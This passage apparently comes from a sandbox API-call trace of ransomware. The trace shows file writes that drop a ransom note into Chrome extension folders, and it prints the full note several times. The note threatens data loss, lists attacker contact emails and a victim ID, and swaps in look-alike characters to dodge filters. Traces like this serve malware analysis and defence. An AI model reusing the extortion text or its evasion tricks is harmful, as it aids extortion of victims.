GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.050] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.050] CloseHandle (hObject=0x294) returned 1 [0285.050] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\#readme_eman#.rtf")) returned 0xffffffff [0285.050] GetLastError () returned 0x2 [0285.050] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.051] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.051] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.051] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up 